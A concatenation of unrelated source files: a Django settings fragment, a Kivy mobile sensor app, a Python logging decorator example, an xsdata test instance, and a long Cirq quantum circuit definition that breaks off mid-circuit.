FCM_DJANGO_SETTINGS = {
"FCM_SERVER_KEY": env.str("FCM_SERVER_KEY", "")
}
# end fcm_django push notifications
# Swagger settings for api docs
SWAGGER_SETTINGS = {
"DEFAULT_INFO": f"{ROOT_URLCONF}.api_info",
}
if DEBUG or not (EMAIL_HOST_USER and EMAIL_HOST_PASSWORD):
# output email to console instead of sending
if not DEBUG:
logging.warning("You should setup `SENDGRID_USERNAME` and `SENDGRID_PASSWORD` env vars to send emails.")
EMAIL_BACKEND = "django.core.mail.backends.console.EmailBackend"
# ==== /Python/motion_client/main.py (repo: robbynickles/portfolio, no license) ====
from kivy.app import App
from kivy.uix.boxlayout import BoxLayout
from kivy.core.window import Window
w, h = Window.width, Window.height
from libs.swipeplane2 import SwipePlane
from libs.device.device_view import DeviceTest
from libs.client.client_view import Client
from plyer import accelerometer, compass, gyroscope
from plyer.libs.server_utils import shutdown_server_thread
class MobileSensorTest(BoxLayout):
def __init__(self):
super(MobileSensorTest, self).__init__()
self.add_widget( DeviceTest( 'Accel', 'Accelerometer', accelerometer, accelerometer._get_acceleration ) )
self.add_widget( DeviceTest( 'Compass', 'Compass', compass, compass._get_orientation ) )
self.add_widget( DeviceTest( 'Gyro', 'Gyroscope', gyroscope, gyroscope._get_orientation ) )
def input_sources( self ):
return self.children
class MobileSensorTestApp(App):
def on_pause(self):
return True
def on_resume(self):
pass
def on_stop(self):
shutdown_server_thread()
def build(self):
swipe_plane = SwipePlane()
self.mobile_sensor_test = MobileSensorTest()
page1 = BoxLayout( pos=(0,0), size=(w, h) )
page1.add_widget( self.mobile_sensor_test )
swipe_plane.add_page( page1 )
page2 = BoxLayout( pos=(1.2*w,0), size=(w, h) )
page2.add_widget( Client( self.mobile_sensor_test.input_sources(), cols=1 ) )
swipe_plane.add_page( page2 )
return swipe_plane
if __name__ == '__main__':
MobileSensorTestApp().run()
# ==== /python/cookbook/decorator_3.py (repo: szqh97/test, no license) ====
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from functools import wraps, partial
import logging
def logged(func=None, *, level=logging.DEBUG, name=None, message=None):
if func is None:
return partial(logged, level=level, name=name, message=message)
logname = name if name else func.__module__
log = logging.getLogger(logname)
logmsg = message if message else func.__name__
@wraps(func)
def wrapper(*args, **kwargs):
log.log(level, logmsg)
return func(*args, **kwargs)
return wrapper
@logged()
def add(x, y):
return x + y
@logged(level=logging.CRITICAL, name='example')
def spam():
print('Spam')
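# A small, hypothetical demo of the decorator above (not part of the original
# cookbook file). logging.basicConfig() is needed so the DEBUG record emitted by
# add() is not filtered out by the root logger's default WARNING level.
if __name__ == '__main__':
    logging.basicConfig(level=logging.DEBUG)
    print(add(2, 3))   # logs "add" at DEBUG level on the __main__ logger, prints 5
    spam()             # logs "spam" at CRITICAL level on the 'example' logger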
# ==== /output/instances/msData/datatypes/Facets/unsignedByte/unsignedByte_totalDigits003.py (repo: tefra/xsdata-w3c-tests, MIT) ====
from output.models.ms_data.datatypes.facets.unsigned_byte.unsigned_byte_total_digits003_xsd.unsigned_byte_total_digits003 import Test
obj = Test(
foo=123
)
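# Hypothetical round-trip sketch, not part of the generated test instance: the
# upstream xsdata dataclass serializer (assumed importable as below) can render
# the instance above back to XML for comparison against the W3C sample document.
from xsdata.formats.dataclass.serializers import XmlSerializer
print(XmlSerializer().render(obj))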
# ==== /n12_m14/circuit_n12_m14_s6_e6_pEFGH.py (repo: tonybruguier/martinis_et_al_data, no license) ====
import cirq
import numpy as np
QUBIT_ORDER = [
cirq.GridQubit(3, 3),
cirq.GridQubit(3, 4),
cirq.GridQubit(3, 5),
cirq.GridQubit(3, 6),
cirq.GridQubit(4, 3),
cirq.GridQubit(4, 4),
cirq.GridQubit(4, 5),
cirq.GridQubit(4, 6),
cirq.GridQubit(5, 3),
cirq.GridQubit(5, 4),
cirq.GridQubit(5, 5),
cirq.GridQubit(5, 6),
]
CIRCUIT = cirq.Circuit(
[
cirq.Moment(
operations=[
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(3, 3)
),
(cirq.X ** 0.5).on(cirq.GridQubit(3, 4)),
(cirq.Y ** 0.5).on(cirq.GridQubit(3, 5)),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(3, 6)
),
(cirq.X ** 0.5).on(cirq.GridQubit(4, 3)),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(4, 4)
),
(cirq.Y ** 0.5).on(cirq.GridQubit(4, 5)),
(cirq.Y ** 0.5).on(cirq.GridQubit(4, 6)),
(cirq.X ** 0.5).on(cirq.GridQubit(5, 3)),
(cirq.X ** 0.5).on(cirq.GridQubit(5, 4)),
(cirq.Y ** 0.5).on(cirq.GridQubit(5, 5)),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(5, 6)
),
]
),
cirq.Moment(
operations=[
cirq.rz(np.pi * 0.2767373377033284).on(cirq.GridQubit(3, 4)),
cirq.rz(np.pi * -0.18492941569567625).on(cirq.GridQubit(3, 5)),
cirq.rz(np.pi * -0.33113463396189063).on(cirq.GridQubit(5, 4)),
cirq.rz(np.pi * 0.40440704518468423).on(cirq.GridQubit(5, 5)),
]
),
cirq.Moment(
operations=[
cirq.FSimGate(theta=1.5862983338115253, phi=0.5200148508319427).on(
cirq.GridQubit(3, 4), cirq.GridQubit(3, 5)
),
cirq.FSimGate(theta=1.5346175385256955, phi=0.5131039467233695).on(
cirq.GridQubit(5, 4), cirq.GridQubit(5, 5)
),
]
),
cirq.Moment(
operations=[
cirq.rz(np.pi * -0.6722145774944012).on(cirq.GridQubit(3, 4)),
cirq.rz(np.pi * 0.7640224995020534).on(cirq.GridQubit(3, 5)),
cirq.rz(np.pi * 0.049341949396894985).on(cirq.GridQubit(5, 4)),
cirq.rz(np.pi * 0.02393046182589869).on(cirq.GridQubit(5, 5)),
]
),
cirq.Moment(
operations=[
(cirq.X ** 0.5).on(cirq.GridQubit(3, 3)),
(cirq.Y ** 0.5).on(cirq.GridQubit(3, 4)),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(3, 5)
),
(cirq.X ** 0.5).on(cirq.GridQubit(3, 6)),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(4, 3)
),
(cirq.X ** 0.5).on(cirq.GridQubit(4, 4)),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(4, 5)
),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(4, 6)
),
(cirq.Y ** 0.5).on(cirq.GridQubit(5, 3)),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(5, 4)
),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(5, 5)
),
(cirq.Y ** 0.5).on(cirq.GridQubit(5, 6)),
]
),
cirq.Moment(
operations=[
cirq.rz(np.pi * -4.480708067260001).on(cirq.GridQubit(3, 5)),
cirq.rz(np.pi * 4.525888267898699).on(cirq.GridQubit(3, 6)),
cirq.rz(np.pi * 2.135954522972214).on(cirq.GridQubit(4, 3)),
cirq.rz(np.pi * -2.1822665205802965).on(cirq.GridQubit(4, 4)),
cirq.rz(np.pi * -3.7780476633662574).on(cirq.GridQubit(4, 5)),
cirq.rz(np.pi * 3.817335880513747).on(cirq.GridQubit(4, 6)),
cirq.rz(np.pi * 0.7811374803446167).on(cirq.GridQubit(5, 3)),
cirq.rz(np.pi * -0.6780279413275597).on(cirq.GridQubit(5, 4)),
]
),
cirq.Moment(
operations=[
cirq.FSimGate(theta=1.541977006124425, phi=0.6073798124875975).on(
cirq.GridQubit(3, 5), cirq.GridQubit(3, 6)
),
cirq.FSimGate(theta=1.5138652502397498, phi=0.47710618607286504).on(
cirq.GridQubit(4, 3), cirq.GridQubit(4, 4)
),
cirq.FSimGate(theta=1.5849169442855044, phi=0.54346233613361).on(
cirq.GridQubit(4, 5), cirq.GridQubit(4, 6)
),
cirq.FSimGate(theta=1.5398075246432927, phi=0.5174515645943538).on(
cirq.GridQubit(5, 3), cirq.GridQubit(5, 4)
),
]
),
cirq.Moment(
operations=[
cirq.rz(np.pi * 5.048199817882042).on(cirq.GridQubit(3, 5)),
cirq.rz(np.pi * -5.0030196172433445).on(cirq.GridQubit(3, 6)),
cirq.rz(np.pi * -2.6543362735839113).on(cirq.GridQubit(4, 3)),
cirq.rz(np.pi * 2.6080242759758283).on(cirq.GridQubit(4, 4)),
cirq.rz(np.pi * 3.9045088495271663).on(cirq.GridQubit(4, 5)),
cirq.rz(np.pi * -3.8652206323796765).on(cirq.GridQubit(4, 6)),
cirq.rz(np.pi * -1.5516585295358842).on(cirq.GridQubit(5, 3)),
cirq.rz(np.pi * 1.6547680685529413).on(cirq.GridQubit(5, 4)),
]
),
cirq.Moment(
operations=[
(cirq.Y ** 0.5).on(cirq.GridQubit(3, 3)),
(cirq.X ** 0.5).on(cirq.GridQubit(3, 4)),
(cirq.X ** 0.5).on(cirq.GridQubit(3, 5)),
(cirq.Y ** 0.5).on(cirq.GridQubit(3, 6)),
(cirq.Y ** 0.5).on(cirq.GridQubit(4, 3)),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(4, 4)
),
(cirq.X ** 0.5).on(cirq.GridQubit(4, 5)),
(cirq.X ** 0.5).on(cirq.GridQubit(4, 6)),
(cirq.X ** 0.5).on(cirq.GridQubit(5, 3)),
(cirq.Y ** 0.5).on(cirq.GridQubit(5, 4)),
(cirq.X ** 0.5).on(cirq.GridQubit(5, 5)),
(cirq.X ** 0.5).on(cirq.GridQubit(5, 6)),
]
),
cirq.Moment(
operations=[
cirq.rz(np.pi * -3.2786928385561493).on(cirq.GridQubit(4, 3)),
cirq.rz(np.pi * 3.339006443218924).on(cirq.GridQubit(5, 3)),
cirq.rz(np.pi * -5.390755870544794).on(cirq.GridQubit(4, 4)),
cirq.rz(np.pi * 5.4172568990486605).on(cirq.GridQubit(5, 4)),
cirq.rz(np.pi * 4.367652291347506).on(cirq.GridQubit(4, 6)),
cirq.rz(np.pi * -3.9105776028384707).on(cirq.GridQubit(5, 6)),
]
),
cirq.Moment(
operations=[
cirq.FSimGate(theta=1.589821065740506, phi=0.5045391214115686).on(
cirq.GridQubit(4, 3), cirq.GridQubit(5, 3)
),
cirq.FSimGate(theta=1.5472406430590444, phi=0.5216932173558055).on(
cirq.GridQubit(4, 4), cirq.GridQubit(5, 4)
),
cirq.FSimGate(theta=1.5707871303628709, phi=0.5176678491729374).on(
cirq.GridQubit(4, 6), cirq.GridQubit(5, 6)
),
]
),
cirq.Moment(
operations=[
cirq.rz(np.pi * 2.9425087256630427).on(cirq.GridQubit(4, 3)),
cirq.rz(np.pi * -2.882195121000268).on(cirq.GridQubit(5, 3)),
cirq.rz(np.pi * 4.466531408750767).on(cirq.GridQubit(4, 4)),
cirq.rz(np.pi * -4.440030380246901).on(cirq.GridQubit(5, 4)),
cirq.rz(np.pi * -4.89701654221443).on(cirq.GridQubit(4, 6)),
cirq.rz(np.pi * 5.354091230723465).on(cirq.GridQubit(5, 6)),
]
),
cirq.Moment(
operations=[
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(3, 3)
),
(cirq.Y ** 0.5).on(cirq.GridQubit(3, 4)),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(3, 5)
),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(3, 6)
),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(4, 3)
),
(cirq.X ** 0.5).on(cirq.GridQubit(4, 4)),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(4, 5)
),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(4, 6)
),
(cirq.Y ** 0.5).on(cirq.GridQubit(5, 3)),
(cirq.X ** 0.5).on(cirq.GridQubit(5, 4)),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(5, 5)
),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(5, 6)
),
]
),
cirq.Moment(
operations=[
cirq.rz(np.pi * 12.703597923836748).on(cirq.GridQubit(3, 3)),
cirq.rz(np.pi * -12.7869629079138).on(cirq.GridQubit(4, 3)),
cirq.rz(np.pi * 3.782562501914174).on(cirq.GridQubit(3, 5)),
cirq.rz(np.pi * -3.873596611893716).on(cirq.GridQubit(4, 5)),
cirq.rz(np.pi * 4.772639843256901).on(cirq.GridQubit(3, 6)),
cirq.rz(np.pi * -4.771314675186062).on(cirq.GridQubit(4, 6)),
]
),
cirq.Moment(
operations=[
cirq.FSimGate(theta=1.4668587973263782, phi=0.4976074601121169).on(
cirq.GridQubit(3, 3), cirq.GridQubit(4, 3)
),
cirq.FSimGate(theta=1.603651215218248, phi=0.46649538437100246).on(
cirq.GridQubit(3, 5), cirq.GridQubit(4, 5)
),
cirq.FSimGate(theta=1.6160334279232749, phi=0.4353897326147861).on(
cirq.GridQubit(3, 6), cirq.GridQubit(4, 6)
),
]
),
cirq.Moment(
operations=[
cirq.rz(np.pi * -12.477250219528523).on(cirq.GridQubit(3, 3)),
cirq.rz(np.pi * 12.39388523545147).on(cirq.GridQubit(4, 3)),
cirq.rz(np.pi * -5.4898636407973544).on(cirq.GridQubit(3, 5)),
cirq.rz(np.pi * 5.398829530817813).on(cirq.GridQubit(4, 5)),
cirq.rz(np.pi * -5.863871460773714).on(cirq.GridQubit(3, 6)),
cirq.rz(np.pi * 5.8651966288445525).on(cirq.GridQubit(4, 6)),
]
),
cirq.Moment(
operations=[
(cirq.Y ** 0.5).on(cirq.GridQubit(3, 3)),
(cirq.X ** 0.5).on(cirq.GridQubit(3, 4)),
(cirq.Y ** 0.5).on(cirq.GridQubit(3, 5)),
(cirq.X ** 0.5).on(cirq.GridQubit(3, 6)),
(cirq.Y ** 0.5).on(cirq.GridQubit(4, 3)),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(4, 4)
),
(cirq.X ** 0.5).on(cirq.GridQubit(4, 5)),
(cirq.Y ** 0.5).on(cirq.GridQubit(4, 6)),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(5, 3)
),
(cirq.Y ** 0.5).on(cirq.GridQubit(5, 4)),
(cirq.X ** 0.5).on(cirq.GridQubit(5, 5)),
(cirq.X ** 0.5).on(cirq.GridQubit(5, 6)),
]
),
cirq.Moment(
operations=[
cirq.rz(np.pi * 5.16073733770325).on(cirq.GridQubit(3, 4)),
cirq.rz(np.pi * -5.068929415695599).on(cirq.GridQubit(3, 5)),
cirq.rz(np.pi * -3.587134633961795).on(cirq.GridQubit(5, 4)),
cirq.rz(np.pi * 3.6604070451845887).on(cirq.GridQubit(5, 5)),
]
),
cirq.Moment(
operations=[
cirq.FSimGate(theta=1.5862983338115253, phi=0.5200148508319427).on(
cirq.GridQubit(3, 4), cirq.GridQubit(3, 5)
),
cirq.FSimGate(theta=1.5346175385256955, phi=0.5131039467233695).on(
cirq.GridQubit(5, 4), cirq.GridQubit(5, 5)
),
]
),
cirq.Moment(
operations=[
cirq.rz(np.pi * -5.556214577494324).on(cirq.GridQubit(3, 4)),
cirq.rz(np.pi * 5.648022499501975).on(cirq.GridQubit(3, 5)),
cirq.rz(np.pi * 3.305341949396799).on(cirq.GridQubit(5, 4)),
cirq.rz(np.pi * -3.232069538174005).on(cirq.GridQubit(5, 5)),
]
),
cirq.Moment(
operations=[
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(3, 3)
),
(cirq.Y ** 0.5).on(cirq.GridQubit(3, 4)),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(3, 5)
),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(3, 6)
),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(4, 3)
),
(cirq.X ** 0.5).on(cirq.GridQubit(4, 4)),
(cirq.Y ** 0.5).on(cirq.GridQubit(4, 5)),
(cirq.X ** 0.5).on(cirq.GridQubit(4, 6)),
(cirq.X ** 0.5).on(cirq.GridQubit(5, 3)),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(5, 4)
),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(5, 5)
),
(cirq.Y ** 0.5).on(cirq.GridQubit(5, 6)),
]
),
cirq.Moment(
operations=[
cirq.rz(np.pi * 7.565359127187911).on(cirq.GridQubit(3, 3)),
cirq.rz(np.pi * -7.506809626368408).on(cirq.GridQubit(3, 4)),
cirq.rz(np.pi * -15.28470806725993).on(cirq.GridQubit(3, 5)),
cirq.rz(np.pi * 15.329888267898626).on(cirq.GridQubit(3, 6)),
cirq.rz(np.pi * 7.019954522972137).on(cirq.GridQubit(4, 3)),
cirq.rz(np.pi * -7.066266520580219).on(cirq.GridQubit(4, 4)),
cirq.rz(np.pi * -13.842047663366333).on(cirq.GridQubit(4, 5)),
cirq.rz(np.pi * 13.881335880513822).on(cirq.GridQubit(4, 6)),
cirq.rz(np.pi * 3.001137480344569).on(cirq.GridQubit(5, 3)),
cirq.rz(np.pi * -2.8980279413275123).on(cirq.GridQubit(5, 4)),
cirq.rz(np.pi * 5.563573798571002).on(cirq.GridQubit(5, 5)),
cirq.rz(np.pi * -5.8504123921354285).on(cirq.GridQubit(5, 6)),
]
),
cirq.Moment(
operations=[
cirq.FSimGate(theta=1.2947043217999283, phi=0.4859467238431821).on(
cirq.GridQubit(3, 3), cirq.GridQubit(3, 4)
),
cirq.FSimGate(theta=1.541977006124425, phi=0.6073798124875975).on(
cirq.GridQubit(3, 5), cirq.GridQubit(3, 6)
),
cirq.FSimGate(theta=1.5138652502397498, phi=0.47710618607286504).on(
cirq.GridQubit(4, 3), cirq.GridQubit(4, 4)
),
cirq.FSimGate(theta=1.5849169442855044, phi=0.54346233613361).on(
cirq.GridQubit(4, 5), cirq.GridQubit(4, 6)
),
cirq.FSimGate(theta=1.5398075246432927, phi=0.5174515645943538).on(
cirq.GridQubit(5, 3), cirq.GridQubit(5, 4)
),
cirq.FSimGate(theta=1.4593314109380113, phi=0.5230636172671492).on(
cirq.GridQubit(5, 5), cirq.GridQubit(5, 6)
),
]
),
cirq.Moment(
operations=[
cirq.rz(np.pi * -7.378072351850649).on(cirq.GridQubit(3, 3)),
cirq.rz(np.pi * 7.436621852670151).on(cirq.GridQubit(3, 4)),
cirq.rz(np.pi * 15.852199817881967).on(cirq.GridQubit(3, 5)),
cirq.rz(np.pi * -15.80701961724327).on(cirq.GridQubit(3, 6)),
cirq.rz(np.pi * -7.538336273583833).on(cirq.GridQubit(4, 3)),
cirq.rz(np.pi * 7.492024275975751).on(cirq.GridQubit(4, 4)),
cirq.rz(np.pi * 13.968508849527241).on(cirq.GridQubit(4, 5)),
cirq.rz(np.pi * -13.929220632379753).on(cirq.GridQubit(4, 6)),
cirq.rz(np.pi * -3.771658529535837).on(cirq.GridQubit(5, 3)),
cirq.rz(np.pi * 3.874768068552894).on(cirq.GridQubit(5, 4)),
cirq.rz(np.pi * -5.593307215154117).on(cirq.GridQubit(5, 5)),
cirq.rz(np.pi * 5.30646862158969).on(cirq.GridQubit(5, 6)),
]
),
cirq.Moment(
operations=[
(cirq.Y ** 0.5).on(cirq.GridQubit(3, 3)),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(3, 4)
),
(cirq.Y ** 0.5).on(cirq.GridQubit(3, 5)),
(cirq.X ** 0.5).on(cirq.GridQubit(3, 6)),
(cirq.Y ** 0.5).on(cirq.GridQubit(4, 3)),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(4, 4)
),
(cirq.X ** 0.5).on(cirq.GridQubit(4, 5)),
(cirq.Y ** 0.5).on(cirq.GridQubit(4, 6)),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(5, 3)
),
(cirq.Y ** 0.5).on(cirq.GridQubit(5, 4)),
(cirq.Y ** 0.5).on(cirq.GridQubit(5, 5)),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(5, 6)
),
]
),
cirq.Moment(
operations=[
cirq.rz(np.pi * -8.162692838556204).on(cirq.GridQubit(4, 3)),
cirq.rz(np.pi * 8.223006443218978).on(cirq.GridQubit(5, 3)),
cirq.rz(np.pi * -12.938755870544817).on(cirq.GridQubit(4, 4)),
cirq.rz(np.pi * 12.965256899048683).on(cirq.GridQubit(5, 4)),
cirq.rz(np.pi * -12.724144773112773).on(cirq.GridQubit(4, 5)),
cirq.rz(np.pi * 12.73446915351482).on(cirq.GridQubit(5, 5)),
cirq.rz(np.pi * 11.027652291347495).on(cirq.GridQubit(4, 6)),
cirq.rz(np.pi * -10.570577602838458).on(cirq.GridQubit(5, 6)),
]
),
cirq.Moment(
operations=[
cirq.FSimGate(theta=1.589821065740506, phi=0.5045391214115686).on(
cirq.GridQubit(4, 3), cirq.GridQubit(5, 3)
),
cirq.FSimGate(theta=1.5472406430590444, phi=0.5216932173558055).on(
cirq.GridQubit(4, 4), cirq.GridQubit(5, 4)
),
cirq.FSimGate(theta=1.5124128267683938, phi=0.5133142626030278).on(
cirq.GridQubit(4, 5), cirq.GridQubit(5, 5)
),
cirq.FSimGate(theta=1.5707871303628709, phi=0.5176678491729374).on(
cirq.GridQubit(4, 6), cirq.GridQubit(5, 6)
),
]
),
cirq.Moment(
operations=[
cirq.rz(np.pi * 7.826508725663096).on(cirq.GridQubit(4, 3)),
cirq.rz(np.pi * -7.7661951210003215).on(cirq.GridQubit(5, 3)),
cirq.rz(np.pi * 12.014531408750791).on(cirq.GridQubit(4, 4)),
cirq.rz(np.pi * -11.988030380246926).on(cirq.GridQubit(5, 4)),
cirq.rz(np.pi * 11.590471496440383).on(cirq.GridQubit(4, 5)),
cirq.rz(np.pi * -11.580147116038336).on(cirq.GridQubit(5, 5)),
cirq.rz(np.pi * -11.55701654221442).on(cirq.GridQubit(4, 6)),
cirq.rz(np.pi * 12.014091230723457).on(cirq.GridQubit(5, 6)),
]
),
cirq.Moment(
operations=[
(cirq.X ** 0.5).on(cirq.GridQubit(3, 3)),
(cirq.Y ** 0.5).on(cirq.GridQubit(3, 4)),
(cirq.X ** 0.5).on(cirq.GridQubit(3, 5)),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(3, 6)
),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(4, 3)
),
(cirq.X ** 0.5).on(cirq.GridQubit(4, 4)),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(4, 5)
),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(4, 6)
),
(cirq.X ** 0.5).on(cirq.GridQubit(5, 3)),
(cirq.X ** 0.5).on(cirq.GridQubit(5, 4)),
(cirq.X ** 0.5).on(cirq.GridQubit(5, 5)),
(cirq.Y ** 0.5).on(cirq.GridQubit(5, 6)),
]
),
cirq.Moment(
operations=[
cirq.rz(np.pi * 26.023597923836856).on(cirq.GridQubit(3, 3)),
cirq.rz(np.pi * -26.106962907913907).on(cirq.GridQubit(4, 3)),
cirq.rz(np.pi * 25.356253063938887).on(cirq.GridQubit(3, 4)),
cirq.rz(np.pi * -25.2805848307585).on(cirq.GridQubit(4, 4)),
cirq.rz(np.pi * 8.370562501914259).on(cirq.GridQubit(3, 5)),
cirq.rz(np.pi * -8.461596611893802).on(cirq.GridQubit(4, 5)),
cirq.rz(np.pi * 10.100639843256841).on(cirq.GridQubit(3, 6)),
cirq.rz(np.pi * -10.099314675186001).on(cirq.GridQubit(4, 6)),
]
),
cirq.Moment(
operations=[
cirq.FSimGate(theta=1.4668587973263782, phi=0.4976074601121169).on(
cirq.GridQubit(3, 3), cirq.GridQubit(4, 3)
),
cirq.FSimGate(theta=1.47511091993527, phi=0.538612093835262).on(
cirq.GridQubit(3, 4), cirq.GridQubit(4, 4)
),
cirq.FSimGate(theta=1.603651215218248, phi=0.46649538437100246).on(
cirq.GridQubit(3, 5), cirq.GridQubit(4, 5)
),
cirq.FSimGate(theta=1.6160334279232749, phi=0.4353897326147861).on(
cirq.GridQubit(3, 6), cirq.GridQubit(4, 6)
),
]
),
cirq.Moment(
operations=[
cirq.rz(np.pi * -25.79725021952863).on(cirq.GridQubit(3, 3)),
cirq.rz(np.pi * 25.713885235451578).on(cirq.GridQubit(4, 3)),
cirq.rz(np.pi * -24.48288974563276).on(cirq.GridQubit(3, 4)),
cirq.rz(np.pi * 24.55855797881315).on(cirq.GridQubit(4, 4)),
cirq.rz(np.pi * -10.07786364079744).on(cirq.GridQubit(3, 5)),
cirq.rz(np.pi * 9.986829530817898).on(cirq.GridQubit(4, 5)),
cirq.rz(np.pi * -11.191871460773655).on(cirq.GridQubit(3, 6)),
cirq.rz(np.pi * 11.193196628844492).on(cirq.GridQubit(4, 6)),
]
),
cirq.Moment(
operations=[
(cirq.Y ** 0.5).on(cirq.GridQubit(3, 3)),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(3, 4)
),
(cirq.Y ** 0.5).on(cirq.GridQubit(3, 5)),
(cirq.X ** 0.5).on(cirq.GridQubit(3, 6)),
(cirq.Y ** 0.5).on(cirq.GridQubit(4, 3)),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(4, 4)
),
(cirq.Y ** 0.5).on(cirq.GridQubit(4, 5)),
(cirq.X ** 0.5).on(cirq.GridQubit(4, 6)),
(cirq.Y ** 0.5).on(cirq.GridQubit(5, 3)),
(cirq.Y ** 0.5).on(cirq.GridQubit(5, 4)),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(5, 5)
),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(5, 6)
),
]
),
cirq.Moment(
operations=[
cirq.rz(np.pi * 10.044737337703173).on(cirq.GridQubit(3, 4)),
cirq.rz(np.pi * -9.952929415695523).on(cirq.GridQubit(3, 5)),
cirq.rz(np.pi * -8.401251133882973).on(cirq.GridQubit(4, 4)),
cirq.rz(np.pi * 8.52245467467511).on(cirq.GridQubit(4, 5)),
cirq.rz(np.pi * -6.843134633961698).on(cirq.GridQubit(5, 4)),
cirq.rz(np.pi * 6.916407045184491).on(cirq.GridQubit(5, 5)),
]
),
cirq.Moment(
operations=[
cirq.FSimGate(theta=1.5862983338115253, phi=0.5200148508319427).on(
cirq.GridQubit(3, 4), cirq.GridQubit(3, 5)
),
cirq.FSimGate(theta=1.5289739216684795, phi=0.5055240639761313).on(
cirq.GridQubit(4, 4), cirq.GridQubit(4, 5)
),
cirq.FSimGate(theta=1.5346175385256955, phi=0.5131039467233695).on(
cirq.GridQubit(5, 4), cirq.GridQubit(5, 5)
),
]
),
cirq.Moment(
operations=[
cirq.rz(np.pi * -10.440214577494247).on(cirq.GridQubit(3, 4)),
cirq.rz(np.pi * 10.5320224995019).on(cirq.GridQubit(3, 5)),
cirq.rz(np.pi * 8.199075778124648).on(cirq.GridQubit(4, 4)),
cirq.rz(np.pi * -8.07787223733251).on(cirq.GridQubit(4, 5)),
cirq.rz(np.pi * 6.561341949396702).on(cirq.GridQubit(5, 4)),
cirq.rz(np.pi * -6.48806953817391).on(cirq.GridQubit(5, 5)),
]
),
cirq.Moment(
operations=[
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(3, 3)
),
(cirq.X ** 0.5).on(cirq.GridQubit(3, 4)),
(cirq.X ** 0.5).on(cirq.GridQubit(3, 5)),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(3, 6)
),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(4, 3)
),
(cirq.Y ** 0.5).on(cirq.GridQubit(4, 4)),
(cirq.X ** 0.5).on(cirq.GridQubit(4, 5)),
(cirq.Y ** 0.5).on(cirq.GridQubit(4, 6)),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(5, 3)
),
(cirq.X ** 0.5).on(cirq.GridQubit(5, 4)),
(cirq.Y ** 0.5).on(cirq.GridQubit(5, 5)),
(cirq.Y ** 0.5).on(cirq.GridQubit(5, 6)),
]
),
cirq.Moment(
operations=[
cirq.rz(np.pi * 12.597359127188014).on(cirq.GridQubit(3, 3)),
cirq.rz(np.pi * -12.538809626368511).on(cirq.GridQubit(3, 4)),
cirq.rz(np.pi * -26.08870806725985).on(cirq.GridQubit(3, 5)),
cirq.rz(np.pi * 26.13388826789855).on(cirq.GridQubit(3, 6)),
cirq.rz(np.pi * 11.90395452297206).on(cirq.GridQubit(4, 3)),
cirq.rz(np.pi * -11.950266520580142).on(cirq.GridQubit(4, 4)),
cirq.rz(np.pi * -23.906047663366408).on(cirq.GridQubit(4, 5)),
cirq.rz(np.pi * 23.945335880513902).on(cirq.GridQubit(4, 6)),
cirq.rz(np.pi * 5.221137480344522).on(cirq.GridQubit(5, 3)),
